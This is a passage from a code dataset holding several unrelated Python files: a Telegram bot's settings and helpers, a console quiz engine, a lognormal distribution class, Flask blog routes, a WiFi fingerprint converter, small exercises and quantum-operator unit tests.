conf['SQL_LOCAL']['DB_PASSWORD']\nelse:\n SQL_DB_NAME = conf['SQL']['DB_NAME']\n SQL_USER = conf['SQL']['DB_USER']\n SQL_PASSWORD = conf['SQL']['DB_PASSWORD']\n\nSQL_URI = 'mysql+pymysql://{}:{}@localhost/{}'.format(SQL_USER, SQL_PASSWORD, SQL_DB_NAME)\n\nengine = create_engine(SQL_URI, pool_recycle=3600)\ncontainer = AlchemySessionContainer(engine=engine)\nalchemy_session = container.new_session('default')\n\n# ============================== Bot messages settings ======================\nEXCLUDE_USERS = conf['EXCLUDE_USERS']\nMSG_TABLE_NAME = conf['SQL_TABLE_NAMES']['MSG_TABLE_NAME']\nMAILING_DATA_TABLE_NAME = conf['SQL_TABLE_NAMES']['MAILING_DATA_TABLE_NAME']\nUSER_PROFILER_DATA_TABLE_NAME = conf['SQL_TABLE_NAMES']['USER_PROFILER_DATA_TABLE_NAME']\nUSER_PROFILER_MAP_TABLE_NAME = conf['SQL_TABLE_NAMES']['USER_PROFILER_MAP_TABLE_NAME']\nSIMPLE_MESSAGE_TYPE = conf['MESSAGES_TYPE']['SIMPLE_MESSAGE']\nPOLL_MESSAGE_TYPE = conf['MESSAGES_TYPE']['POLL_MESSAGE']\nUSER_POLL_MAP_TABLE_NAME = conf['SQL_TABLE_NAMES']['USER_POLL_MAP_TABLE_NAME']\n\n# ============================== BOT SETTINGS ======================\nPAYMENT_TOKEN = conf['TELEGRAM']['PAYMENT_TOKEN']\nCOMMAND_TOKEN = conf['TELEGRAM']['COMMAND_TOKEN']\nPAYMENT_SUCCESS_LISTEN = conf['TELEGRAM']['PAYMENT_SUCCESS_LISTEN']\nPAYMENT_SUCCESS_LISTEN_PORT = conf['TELEGRAM']['PAYMENT_SUCCESS_LISTEN_PORT']\n\nYAHOO_PATH = conf['PATHS']['YAHOO_PATH']\nTARIFF_IMAGES = conf['TELEGRAM']['TARIFF_IMAGES']\nBTC = conf['CREDENTIALS']['BTC']\nETH = conf['CREDENTIALS']['ETH']\nAPI_KEY = conf['TELEGRAM']['API_KEY']\nAPI_HASH = conf['TELEGRAM']['API_HASH']\nif os.path.exists(conf_dir+'local.conf'):\n UPSILON = conf['TELEGRAM']['UPSILON_LOCAL']\nelse:\n UPSILON = conf['TELEGRAM']['UPSILON']\nOWNER = conf['TELEGRAM']['OWNER']\nOWNER1 = conf['TELEGRAM']['OWNER1']\nOWNERS = conf['OWNERS']\nSERVICE_CHAT = conf['TELEGRAM']['SERVICE_CHAT']\n\nDONATE_DATA_TABLE_NAME = conf['SQL_TABLE_NAMES']['DONATE_DATA_TABLE_NAME']\nLAST_ACTION_TABLE_NAME = conf['SQL_TABLE_NAMES']['LAST_ACTION_TABLE_NAME']\nREQUEST_AMOUNT_TABLE_NAME = conf['SQL_TABLE_NAMES']['REQUEST_AMOUNT_TABLE_NAME']\nINCOMING_USERS_TABLE_NAME = conf['SQL_TABLE_NAMES']['INCOMING_USERS_TABLE_NAME']\nPAYMENT_HIST_TABLE_NAME = conf['SQL_TABLE_NAMES']['PAYMENT_HIST_TABLE_NAME']\n# ============================== Logging Setup ======================\n# logging.basicConfig(\n# filemode='w',\n# filename=os.path.abspath('logs/invest_services.log'),\n# format='[%(levelname) 5s/%(asctime)s] %(name)s: %(message)s',\n# level=logging.WARNING)\n# logging.getLogger('scrapers').setLevel(level=logging.WARNING)\n\nRECURSION_DEPTH = 5\nUSER_PROFILER_QUESTION_AMOUNT = 13\n\nWARNING = conf['DEBUG_TYPE']['WARNING']\nERROR = conf['DEBUG_TYPE']['ERROR']\n\nDEBUG_LOG_FILE = None\n\n\ndef is_debug_init():\n global DEBUG_LOG_FILE\n if DEBUG_LOG_FILE is None:\n return False\n else:\n return True\n\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n\n def disable(self):\n self.HEADER = ''\n self.OKBLUE = ''\n self.OKGREEN = ''\n self.WARNING = ''\n self.FAIL = ''\n self.ENDC = ''\n\n\n# Print iterations progress\ndef print_progress_bar(iteration, total, prefix='', suffix='', decimals=1, length=100, fill='█', print_end=\"\"):\n \"\"\"\n Call in a loop to create terminal progress bar\n @params:\n iteration - Required : current iteration (Int)\n total - Required : total iterations (Int)\n prefix - Optional : prefix string (Str)\n suffix - 
Optional : suffix string (Str)\n        decimals - Optional : positive number of decimals in percent complete (Int)\n        length - Optional : character length of bar (Int)\n        fill - Optional : bar fill character (Str)\n        print_end - Optional : end character (e.g. \"\\r\", \"\\r\\n\") (Str)\n    \"\"\"\n    percent = (\"{0:.\" + str(decimals) + \"f}\").format(100 * (iteration / float(total)))\n    filled_length = int(length * iteration // total)\n    bar = fill * filled_length + '-' * (length - filled_length)\n    print(f'\\r{prefix} |{bar}| {percent}% {suffix}', end=print_end)\n    # Print New Line on Complete\n    if iteration == total:\n        print()\n\n\ndef debug_init(file_name=\"debug.log\"):\n    # print(f'%% Init log file: {file_name}')\n    global DEBUG_LOG_FILE\n    fname = f'{LOGS_PATH}{file_name}'\n    bufsize = 1\n    DEBUG_LOG_FILE = open(fname, \"a\", buffering=bufsize)\n\n\ndef debug_deinit():\n    global DEBUG_LOG_FILE\n    if DEBUG_LOG_FILE is not None:\n        DEBUG_LOG_FILE.close()\n        DEBUG_LOG_FILE = None\n\n\ndef debug(print_string=\"\", debug_type=\"NORMAL\", micro=False):\n    caller_frame_record = inspect.stack()[1]\n    frame = caller_frame_record[0]\n    info = inspect.getframeinfo(frame)\n    path, filename = os.path.split(info.filename)\n    dt = datetime.datetime.now()\n    time_format = ''\n    if micro:\n        time_format = \"%H:%M:%S.%f\"\n    else:\n        time_format = \"%H:%M:%S\"\n\n    global DEBUG_LOG_FILE\n    if DEBUG_LOG_FILE is not None:\n        DEBUG_LOG_FILE.write(f'[{dt.strftime(time_format)}]{filename}:{info.lineno}:{print_string}\\n')\n    else:\n        if debug_type == \"NORMAL\":\n            print(f'[{dt.strftime(time_format)}]{filename}:{info.lineno}:{print_string}')\n        elif debug_type == \"WARNING\":\n            print(f'{bcolors.WARNING}[{dt.strftime(time_format)}]{filename}:{info.lineno}:{print_string}{bcolors.ENDC}')\n        elif debug_type == \"ERROR\":\n            print(f'{bcolors.FAIL}[{dt.strftime(time_format)}]{filename}:{info.lineno}:{print_string}{bcolors.ENDC}')\n\n\ndef add_months(sourcedate, months):\n    month = sourcedate.month - 1 + months\n    year = sourcedate.year + month // 12\n    month = month % 12 + 1\n    day = min(sourcedate.day, calendar.monthrange(year, month)[1])\n    return datetime.date(year, month, day)\n\n\ndef get_last_day_of_month(year, month):\n    return calendar.monthrange(year, month)[1]\n\n\ndef add_watermark(before, after, font_size=16, watermark_color=(217, 217, 217, 20)):\n    img_to_edit = before\n    image = Image.open(img_to_edit).convert(\"RGBA\")\n    txt_img = Image.new(\"RGBA\", image.size, (255, 255, 255, 0))\n    draw = ImageDraw.Draw(txt_img)\n    font = ImageFont.truetype(\"arialbd.ttf\", font_size)\n    # text = \"(c) @UpsilonBot\"\n    text = \"@UpsilonBot\"\n    font_width, font_height = font.getsize(text)\n    x = image.width/2 - font_width/2\n    y = image.height/2 - font_height/2\n    draw.text((x, y), text, font=font, fill=watermark_color)\n    save_path = after\n    composite = Image.alpha_composite(image, txt_img)\n    composite.save(save_path)\n\n\ndef check_int(s):\n    if s is None or s == \"\":\n        return False\n    if s[0] in ('-', '+'):\n        return s[1:].isdigit()\n    return s.isdigit()","repo_name":"wideGenesis/upsilon_one","sub_path":"project_shared.py","file_name":"project_shared.py","file_ext":"py","file_size_in_byte":12852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"20821193189","text":"\"\"\"Game engine.\"\"\"\nimport prompt\n\nfrom brain_games.cli import ask_user_name, welcome_user\n\n\ndef run_game(rules, game):\n    \"\"\"\n    Run game engine.\n\n    Parameters:\n        rules: game rules, will be displayed to the user at the beginning.\n        
game: (question, answer) tuple.\n \"\"\"\n welcome_user()\n name = ask_user_name()\n print(rules)\n\n win_count = 0\n while win_count < 3:\n (question, answer) = game()\n print(f'Question: {question}')\n user_answer = prompt.string('Your answer: ')\n\n if user_answer == answer:\n print('Correct!')\n win_count += 1\n else:\n print(f'{user_answer} is wrong answer ;(. Correct answer was {answer}.') # noqa: E501\n print(f\"Let's try again, {name}!\")\n return\n print(f'Congratulations, {name}!')\n","repo_name":"alexander-lozovsky/python-project-lvl1","sub_path":"brain_games/run_game.py","file_name":"run_game.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2796347845","text":"\"\"\" @MvNormalDistribution\nModule defining a multivariate normal distribution with statistical procedures\n\"\"\"\n#from copy import deepcopy\nfrom numpy import empty, exp, float64, linspace, squeeze\nfrom numpy import log as nplog\n\nfrom ...base import utilities\nfrom .baseDistribution import baseDistribution\nfrom ..core import StatArray\nfrom .MvNormalDistribution import MvNormal\nfrom scipy.stats import multivariate_normal\n\nclass MvLogNormal(MvNormal):\n \"\"\"Class extension to geobipy.baseDistribution\n\n Handles a multivariate lognormal distribution. Uses Scipy to evaluate probabilities,\n but Numpy to generate random samples since scipy is slow.\n\n MvLogNormal(mean, variance, ndim, linearSpace, prng)\n\n Parameters\n ----------\n mean : scalar or array_like\n Mean(s) for each dimension\n variance : scalar or array_like\n Variance of the logged values for each dimension\n ndim : int, optional\n The number of dimensions in the multivariate normal.\n Only used if mean and variance are scalars that are constant for all dimensions\n linearSpace : bool, optional\n If False, any input and output is in log space.\n If True, input and output is in linear space.\n Inputs are internally logged, and the exponential of any output is returned\n prng : numpy.random.RandomState, optional\n A random state to generate random numbers. Required for parallel instantiation.\n\n Returns\n -------\n out : MvLogNormal\n Multivariate lognormal distribution.\n\n \"\"\"\n def __init__(self, mean, variance, ndim=None, linearSpace=False, prng=None):\n \"\"\" Initialize a multivariate lognormal distribution. 
\"\"\"\n if linearSpace:\n mean = nplog(mean)\n self.linearSpace = linearSpace\n super().__init__(mean, variance, ndim, prng=prng)\n\n @property\n def mean(self):\n return exp(self._mean) if self.linearSpace else self._mean\n\n @mean.setter\n def mean(self, values):\n self._mean[:] = nplog(values) if self.linearSpace else values\n\n def __deepcopy__(self, memo={}):\n \"\"\" Define a deepcopy routine \"\"\"\n if self._constant:\n return MvLogNormal(mean=self.mean[0], variance=self.variance[0, 0], ndim=self.ndim, linearSpace=self.linearSpace, prng=self.prng)\n else:\n return MvLogNormal(mean=self.mean, variance=self.variance, linearSpace=self.linearSpace, prng=self.prng)\n\n def derivative(self, x, order):\n if self.linearSpace:\n x = nplog(x)\n return super().derivative(x, order)\n\n def deviation(self, x):\n if self.linearSpace:\n x = nplog(x)\n return super().deviation(x)\n\n def rng(self, size = 1):\n return exp(super().rng(size)) if self.linearSpace else super().rng(size)\n\n def probability(self, x, log, axis=None, **kwargs):\n if self.linearSpace:\n x = nplog(x)\n\n return super().probability(x=x, log=log, axis=axis)\n\n def bins(self, nBins=99, nStd=4.0, axis=None, relative=False):\n \"\"\"Discretizes a range given the mean and variance of the distribution\n\n Parameters\n ----------\n nBins : int, optional\n Number of bins to return.\n nStd : float, optional\n The bin edges = mean +- nStd * variance.\n dim : int, optional\n Get the bins of this dimension, if None, returns bins for all dimensions.\n\n Returns\n -------\n bins : geobipy.StatArray\n The bin edges.\n\n \"\"\"\n # if not self.linearSpace:\n # return super().bins(nBins, nStd, axis)\n\n nStd = float64(nStd)\n nD = self.ndim\n if (nD > 1):\n if axis is None:\n bins = StatArray.StatArray(empty([nD, nBins+1]), name=utilities.getName(self.mean), units=utilities.getUnits(self.mean))\n for i in range(nD):\n tmp = squeeze(nStd * self.std[i, i])\n t = linspace(-tmp, tmp, nBins+1)\n if not relative:\n t += self._mean[i]\n bins[i, :] = t\n else:\n bins = empty(nBins+1)\n tmp = squeeze(nStd * self.std[axis, axis])\n t = linspace(-tmp, tmp, nBins+1)\n if not relative:\n t += self._mean[axis]\n bins[:] = t\n\n else:\n tmp = nStd * self.std\n bins = squeeze(linspace(-tmp, tmp, nBins+1))\n if not relative:\n bins += self._mean\n\n return (exp(bins)) if self.linearSpace else StatArray.StatArray(bins)\n\n @property\n def summary(self):\n msg = \"{}\\n\".format(type(self).__name__)\n if self.linearSpace:\n msg += ' Mean:log{}\\n'.format(self.mean)\n else:\n msg += ' Mean:{}\\n'.format(self.mean)\n msg += 'Variance:{}\\n'.format(self._variance)\n return msg","repo_name":"DOI-USGS/geobipy","sub_path":"geobipy/src/classes/statistics/MvLogNormalDistribution.py","file_name":"MvLogNormalDistribution.py","file_ext":"py","file_size_in_byte":4951,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"53"} +{"seq_id":"28715880398","text":"#\r\n# Created by Voronov Vadim\r\n#\r\n\r\n\r\nfrom flask import render_template, request, abort, redirect, url_for\r\n\r\nfrom app import app\r\nfrom app import post_services\r\nfrom app import images_services\r\n\r\nimport logging\r\n\r\n\r\n@app.route(\"/\", methods=[\"GET\"])\r\ndef home():\r\n try:\r\n posts = post_services.get_posts()\r\n return render_template(\"home.html\", posts=posts)\r\n except Exception as e:\r\n logging.exception(e)\r\n abort(500)\r\n\r\n\r\n@app.route(\"/create-post\", methods=[\"GET\", \"POST\"])\r\ndef create_post():\r\n try:\r\n if 
request.method == 'POST':\r\n            title = request.form.get(\"title\")\r\n            text = request.form.get(\"text\")\r\n            image_filename = None\r\n            if 'image' in request.files:\r\n                image_filename = images_services.save(request.files['image'])\r\n            if title and text:\r\n                post_services.create_new_post(title, text, image_filename)\r\n            else:\r\n                abort(400)\r\n        return render_template(\"create_post.html\")\r\n    except Exception as e:\r\n        logging.exception(e)\r\n        abort(500)\r\n\r\n\r\n@app.route(\"/delete-post\", methods=[\"GET\"])\r\ndef delete_post():\r\n    try:\r\n        post_id = request.args.get(\"id\", type=int)\r\n        if post_id is None:\r\n            abort(400)\r\n        post_services.try_delete(post_id)\r\n        return redirect(url_for('home'))\r\n    except Exception as e:\r\n        logging.exception(e)\r\n        abort(500)\r\n","repo_name":"Rright/new-blog","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"72566534887","text":"#!/bin/python\n\nimport json\nimport sys\nimport time\nfrom datetime import datetime\nfrom collections import OrderedDict\n\n\nif len(sys.argv) != 5:\n    print(\"Usage: python3 convert_uji_to_upb_format.py trn01crd.csv trn01rss.csv trn01tms.csv test.json\")\n    sys.exit()\n\ninput_file1 = sys.argv[1]\ninput_file2 = sys.argv[2]\ninput_file3 = sys.argv[3]\njson_file = sys.argv[4]\n\n# Using readlines()\ninput_rss = open(input_file2, 'r')\ninput_crd = open(input_file1, 'r')\ninput_tms = open(input_file3, 'r')\nrss_lines = input_rss.readlines()\ncrd_lines = input_crd.readlines()\ntms_lines = input_tms.readlines()\n\njson_content = {}\n\nc = 0 # collection number\nfor i in range(0, len(rss_lines), 6):\n# print(crd_lines[i].split(\",\")[2].rstrip(\"\\n\"))\n# print(str(crd_lines[i].split(\",\")[1]))\n    wifi = {}\n    for k in range(i, i+6,1):\n        for j in range(0, len(rss_lines[k].split(',')), 1):\n            if int(rss_lines[k].split(',')[j]) == 100:\n                continue\n            if \"AP\"+str(j) in wifi:\n                if isinstance(wifi[\"AP\"+str(j)][\"rssi\"], str):\n                    wifi[\"AP\"+str(j)][\"rssi\"] = [int(rss_lines[k].split(',')[j])]\n                if isinstance(wifi[\"AP\"+str(j)][\"rssi\"], int):\n                    wifi[\"AP\"+str(j)][\"rssi\"] = [rss_lines[k].split(',')[j]]\n                if isinstance(wifi[\"AP\"+str(j)][\"rssi\"], list):\n                    a = int(rss_lines[k].split(',')[j])\n                    wifi[\"AP\"+str(j)][\"rssi\"].append(a)\n            else:\n                wifi[\"AP\"+str(j)] = {\"ssid\":\"?\", \"frequency\":\"?\", \"rssi\": [int(rss_lines[k].split(',')[j])]}\n\n    ordWifi = sorted([int(x[2:]) for x in wifi.keys()])\n    newWifi = OrderedDict()\n    for key in ordWifi:\n        newWifi[\"AP\"+str(key)] = wifi[\"AP\"+str(key)]\n\n\n    fingerprints = []\n    x = datetime(int(tms_lines[i][0:4]), int(tms_lines[i][4:6]), int(tms_lines[i][6:8]), \\\n        int(tms_lines[i][8:10]), int(tms_lines[i][10:12]), int(tms_lines[i][12:14]))\n    fingerprints.append({\"timestamp\": x.strftime('%d-%m-%Y %H:%M:%S'), \"wifi\": wifi, \"ble\": {}, \"gps\": [], \"telephony\": []})\n    json_content[\"collection\"+str(c)] = {\"devId\":\"?\", \"devName\":\"?\", \"AndroidVersion\": \"?\",\\\n                                         \"comment\": \"tau\", \"map\":\"tau\",\\\n                                         \"x\":float(crd_lines[i].split(\",\")[0]),\\\n                                         \"y\":float(crd_lines[i].split(\",\")[1]),\\\n                                         \"z\":float(crd_lines[i].split(\",\")[2].rstrip(\"\\n\")),\n                                         \"fingerprints\": fingerprints}\n    c += 1\n\nwith open(json_file, 'w') as outfile:\n    json.dump(json_content, outfile, indent=4)\n# json.dumps({int(x):json_content[x] for x in json_content}, outfile, indent = 4, 
sort_keys=True)\n","repo_name":"documenteinaer/similarity","sub_path":"convert_uji_to_upb_format.py","file_name":"convert_uji_to_upb_format.py","file_ext":"py","file_size_in_byte":2741,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"16265966018","text":"import sys\n\ndef rememberer(thing):\n    # open file\n    file = open(\"database.txt\", \"a\")\n\n    # write thing to file\n    file.write(thing+\"\\n\")\n\n    # close file\n    file.close()\n\n# context manager pattern for dealing with files\ndef rememberer_with(thing):\n    with open(\"database.txt\", \"a\") as file:\n        file.write(thing+\"\\n\")\n\ndef show():\n    # open file using a context manager\n    with open(\"database.txt\") as file:\n        # print out each line in file\n        for line in file:\n            print(line)\n\nif __name__ == '__main__':\n    if sys.argv[1].lower() == \"--list\":\n        show()\n    else: \n        # rememberer_with(input(\"What should I remember? > \"))\n        rememberer_with(' '.join(sys.argv[1:]))\n","repo_name":"duliodenis/python_master_degree","sub_path":"unit_04/W2-File_IO/remember.py","file_name":"remember.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"}
{"seq_id":"39034760789","text":"#!/usr/bin/python3\n\"\"\"Function to divide all elements of a matrix\"\"\"\n\n\ndef matrix_divided(matrix, div):\n    \"\"\"Method to divide the elements\n    Arguments: matrix, div.\n    Raises: errors depending on the case.\n    Returns: elements divided\n    \"\"\"\n    err1 = \"matrix must be a matrix (list of lists) of integers/floats\"\n    err2 = \"Each row of the matrix must have the same size\"\n    err3 = \"div must be a number\"\n    err4 = \"division by zero\"\n    if len(matrix[0]) == 0:\n        raise TypeError(err1)\n\n    for row in matrix:\n        if len(matrix[0]) != len(row):\n            raise TypeError(err2)\n        for obj in row:\n            if type(obj) not in (int, float):\n                raise TypeError(err1)\n\n    if type(div) not in (int, float):\n        raise TypeError(err3)\n\n    if div == 0:\n        raise ZeroDivisionError(err4)\n\n    return [[round((obj / div), 2) for obj in row] for row in matrix]\n","repo_name":"acamilojuan/holbertonschool-higher_level_programming","sub_path":"0x07-python-test_driven_development/2-matrix_divided.py","file_name":"2-matrix_divided.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"3599544076","text":"# -*- coding: utf-8 -*-\n\"\"\"\nFIBONACCI EM VETOR\n\"\"\"\n\ndef main():\n    fibonacci = [0, 1]\n    T = int(input())\n    while T > 0:\n        N = int(input())\n        for i in range(N):\n            item = fibonacci[-1] + fibonacci[-2]\n            fibonacci.append(item)\n        print('Fib(%d) = %d' %(N, fibonacci[N]))\n        T -= 1\n\nif __name__ == '__main__':\n    main()\n","repo_name":"sywrahg/URI","sub_path":"1176 - Fibonacci em Vetor.py","file_name":"1176 - Fibonacci em Vetor.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"23665932638","text":"import unittest\nimport random\nimport numpy as np\nimport pyquil\nimport os\n\nfrom cirq import GridQubit, LineQubit, X, Y, Z, PauliSum, PauliString\nfrom openfermion import (\n    QubitOperator,\n    IsingOperator,\n    FermionOperator,\n    qubit_operator_sparse,\n    get_interaction_operator,\n    get_fermion_operator,\n    jordan_wigner,\n    get_sparse_operator,\n)\nfrom openfermion.hamiltonians import fermi_hubbard\nfrom openfermion.linalg import jw_get_ground_state_at_particle_number\n\nfrom 
..circuit import Circuit, Gate, Qubit, build_uniform_param_grid\nfrom ..measurement import ExpectationValues\nfrom ..utils import RNDSEED, create_object, hf_rdm\nfrom ..interfaces.mock_objects import MockAnsatz\n\nfrom ._io import load_interaction_operator\n\nfrom ._utils import (\n    generate_random_qubitop,\n    get_qubitop_from_coeffs_and_labels,\n    evaluate_qubit_operator,\n    get_qubitop_from_matrix,\n    reverse_qubit_order,\n    get_expectation_value,\n    change_operator_type,\n    evaluate_operator_for_parameter_grid,\n    get_fermion_number_operator,\n    get_diagonal_component,\n    get_polynomial_tensor,\n    qubitop_to_paulisum,\n    create_circuits_from_qubit_operator,\n    evaluate_qubit_operator_list,\n    get_ground_state_rdm_from_qubit_op,\n    remove_inactive_orbitals,\n)\n\n\nclass TestQubitOperator(unittest.TestCase):\n    def test_build_qubitoperator_from_coeffs_and_labels(self):\n        # Given\n        test_op = QubitOperator(((0, \"Y\"), (1, \"X\"), (2, \"Z\"), (4, \"X\")), 3.0j)\n        coeffs = [3.0j]\n        labels = [[2, 1, 3, 0, 1]]\n\n        # When\n        build_op = get_qubitop_from_coeffs_and_labels(coeffs, labels)\n\n        # Then\n        self.assertEqual(test_op, build_op)\n\n    def test_qubitop_matrix_conversion(self):\n        # Given\n        m = 4\n        n = 2 ** m\n        TOL = 10 ** -15\n        random.seed(RNDSEED)\n        A = np.array([[random.uniform(-1, 1) for x in range(n)] for y in range(n)])\n\n        # When\n        A_qubitop = get_qubitop_from_matrix(A)\n        A_qubitop_matrix = np.array(qubit_operator_sparse(A_qubitop).todense())\n        test_matrix = A_qubitop_matrix - A\n\n        # Then\n        for row in test_matrix:\n            for elem in row:\n                self.assertEqual(abs(elem) < TOL, True)\n\n    def test_generate_random_qubitop(self):\n        # Given\n        nqubits = 4\n        nterms = 5\n        nlocality = 2\n        max_coeff = 1.5\n        fixed_coeff = False\n\n        # When\n        qubit_op = generate_random_qubitop(\n            nqubits, nterms, nlocality, max_coeff, fixed_coeff\n        )\n        # Then\n        self.assertEqual(len(qubit_op.terms), nterms)\n        for term, coefficient in qubit_op.terms.items():\n            for i in range(nlocality):\n                self.assertLess(term[i][0], nqubits)\n            self.assertEqual(len(term), nlocality)\n            self.assertLessEqual(np.abs(coefficient), max_coeff)\n\n        # Given\n        fixed_coeff = True\n        # When\n        qubit_op = generate_random_qubitop(\n            nqubits, nterms, nlocality, max_coeff, fixed_coeff\n        )\n        # Then\n        self.assertEqual(len(qubit_op.terms), nterms)\n        for term, coefficient in qubit_op.terms.items():\n            self.assertEqual(np.abs(coefficient), max_coeff)\n\n    def test_evaluate_qubit_operator(self):\n        # Given\n        qubit_op = QubitOperator(\"0.5 [] + 0.5 [Z1]\")\n        expectation_values = ExpectationValues([0.5, 0.5])\n        # When\n        value_estimate = evaluate_qubit_operator(qubit_op, expectation_values)\n        # Then\n        self.assertAlmostEqual(value_estimate.value, 0.5)\n\n    def test_evaluate_qubit_operator_list(self):\n        # Given\n        qubit_op_list = [\n            QubitOperator(\"0.5 [] + 0.5 [Z1]\"),\n            QubitOperator(\"0.3 [X1] + 0.2[Y2]\"),\n        ]\n        expectation_values = ExpectationValues([0.5, 0.5, 0.4, 0.6])\n        # When\n        value_estimate = evaluate_qubit_operator_list(qubit_op_list, expectation_values)\n        # Then\n        self.assertAlmostEqual(value_estimate.value, 0.74)\n\n    def test_evaluate_operator_for_parameter_grid(self):\n        # Given\n        ansatz = MockAnsatz(4, 2)\n        grid = build_uniform_param_grid(1, 2, 0, np.pi, np.pi / 10)\n        backend = create_object(\n            {\n                \"module_name\": \"zquantum.core.interfaces.mock_objects\",\n                \"function_name\": \"MockQuantumSimulator\",\n            }\n        )\n        op = QubitOperator(\"0.5 [] + 0.5 [Z1]\")\n        previous_layer_parameters = [1, 1]\n        # When\n        (\n            parameter_grid_evaluation,\n            optimal_parameters,\n        ) = 
evaluate_operator_for_parameter_grid(\n            ansatz, grid, backend, op, previous_layer_params=previous_layer_parameters\n        )\n        # Then (for brevity, only check first and last evaluations)\n        self.assertIsInstance(parameter_grid_evaluation[0][\"value\"].value, float)\n        self.assertEqual(parameter_grid_evaluation[0][\"parameter1\"], 0)\n        self.assertEqual(parameter_grid_evaluation[0][\"parameter2\"], 0)\n        self.assertIsInstance(parameter_grid_evaluation[99][\"value\"].value, float)\n        self.assertEqual(\n            parameter_grid_evaluation[99][\"parameter1\"], np.pi - np.pi / 10\n        )\n        self.assertEqual(\n            parameter_grid_evaluation[99][\"parameter2\"], np.pi - np.pi / 10\n        )\n\n        self.assertEqual(len(optimal_parameters), 4)\n        self.assertEqual(optimal_parameters[0], 1)\n        self.assertEqual(optimal_parameters[1], 1)\n\n    def test_reverse_qubit_order(self):\n        # Given\n        op1 = QubitOperator(\"[Z0 Z1]\")\n        op2 = QubitOperator(\"[Z1 Z0]\")\n\n        # When/Then\n        self.assertEqual(op1, reverse_qubit_order(op2))\n\n        # Given\n        op1 = QubitOperator(\"Z0\")\n        op2 = QubitOperator(\"Z1\")\n\n        # When/Then\n        self.assertEqual(op1, reverse_qubit_order(op2, n_qubits=2))\n        self.assertEqual(op2, reverse_qubit_order(op1, n_qubits=2))\n\n    def test_get_expectation_value(self):\n        \"\"\"Check <Z0> and <Z1> for the state |100>\"\"\"\n        # Given\n        wf = pyquil.wavefunction.Wavefunction([0, 1, 0, 0, 0, 0, 0, 0])\n        op1 = QubitOperator(\"Z0\")\n        op2 = QubitOperator(\"Z1\")\n        # When\n        exp_op1 = get_expectation_value(op1, wf)\n        exp_op2 = get_expectation_value(op2, wf)\n\n        # Then\n        self.assertAlmostEqual(-1, exp_op1)\n        self.assertAlmostEqual(1, exp_op2)\n\n    def test_change_operator_type(self):\n        # Given\n        operator1 = QubitOperator(\"Z0 Z1\", 4.5)\n        operator2 = IsingOperator(\"Z0 Z1\", 4.5)\n        operator3 = IsingOperator()\n        operator4 = IsingOperator(\"Z0\", 0.5) + IsingOperator(\"Z1\", 2.5)\n        # When\n        new_operator1 = change_operator_type(operator1, IsingOperator)\n        new_operator2 = change_operator_type(operator2, QubitOperator)\n        new_operator3 = change_operator_type(operator3, QubitOperator)\n        new_operator4 = change_operator_type(operator4, QubitOperator)\n\n        # Then\n        self.assertEqual(IsingOperator(\"Z0 Z1\", 4.5), new_operator1)\n        self.assertEqual(QubitOperator(\"Z0 Z1\", 4.5), new_operator2)\n        self.assertEqual(QubitOperator(), new_operator3)\n        self.assertEqual(\n            QubitOperator(\"Z0\", 0.5) + QubitOperator(\"Z1\", 2.5), new_operator4\n        )\n\n    def test_get_fermion_number_operator(self):\n        # Given\n        n_qubits = 4\n        n_particles = None\n        correct_operator = get_interaction_operator(\n            FermionOperator(\n                \"\"\"\n        0.0 [] +\n        1.0 [0^ 0] +\n        1.0 [1^ 1] +\n        1.0 [2^ 2] +\n        1.0 [3^ 3]\n        \"\"\"\n            )\n        )\n\n        # When\n        number_operator = get_fermion_number_operator(n_qubits)\n\n        # Then\n        self.assertEqual(number_operator, correct_operator)\n\n        # Given\n        n_qubits = 4\n        n_particles = 2\n        correct_operator = get_interaction_operator(\n            FermionOperator(\n                \"\"\"\n        -2.0 [] +\n        1.0 [0^ 0] +\n        1.0 [1^ 1] +\n        1.0 [2^ 2] +\n        1.0 [3^ 3]\n        \"\"\"\n            )\n        )\n\n        # When\n        number_operator = get_fermion_number_operator(n_qubits, n_particles)\n\n        # Then\n        self.assertEqual(number_operator, correct_operator)\n\n    def test_create_circuits_from_qubit_operator(self):\n        # Initialize target\n        qubits = [Qubit(i) for i in range(0, 2)]\n\n        gate_Z0 = Gate(\"Z\", [qubits[0]])\n        gate_X1 = Gate(\"X\", [qubits[1]])\n\n        gate_Y0 = Gate(\"Y\", [qubits[0]])\n        gate_Z1 = Gate(\"Z\", [qubits[1]])\n\n        circuit1 = Circuit()\n        circuit1.qubits = qubits\n        circuit1.gates = [gate_Z0, gate_X1]\n\n        circuit2 = Circuit()\n        circuit2.qubits = qubits\n        
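# Second target circuit: Y on qubit 0 and Z on qubit 1, matching the Y0 Z1 term.\n        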
